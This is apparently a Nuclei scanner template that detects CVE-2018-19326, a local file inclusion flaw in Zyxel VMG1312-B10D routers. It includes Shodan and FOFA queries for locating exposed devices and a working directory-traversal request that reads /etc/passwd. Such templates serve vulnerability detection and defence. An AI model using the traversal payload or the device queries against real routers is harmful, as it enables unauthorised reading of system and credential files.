id: CVE-2018-19326 info: name: Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion author: 0x_Akoko severity: high description: | Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files. impact: | Successful exploitation of this vulnerability allows an attacker to read sensitive files on the target system. remediation: | Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability. reference: - https://www.exploit-db.com/exploits/45904 - https://www.cybersecurity-help.cz/vdb/SB2018120309 - https://www.zyxel.com/homepage.shtml - https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33 - https://nvd.nist.gov/vuln/detail/CVE-2018-19326 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-19326 cwe-id: CWE-22 epss-score: 0.00845 epss-percentile: 0.82119 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zyxel product: vmg1312-b10d_firmware shodan-query: - http.html:"VMG1312-B10D" - http.html:"vmg1312-b10d" fofa-query: body="vmg1312-b10d" tags: cve2018,cve,lfi,modem,router,edb,zyxel http: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: header words: - "application/octet-stream" - type: regex part: body regex: - "root:.*:0:0:" # digest: 4b0a00483046022100a0b256edd487a4e35692ced0880977fb54adc0c0c2c0104435696e447edf167d022100c839934f8b9be8f49836ed75711777736cb85e7e81d1380fdb8f7bf5373de4a9:922c64590222798bb761d5b6d8e72950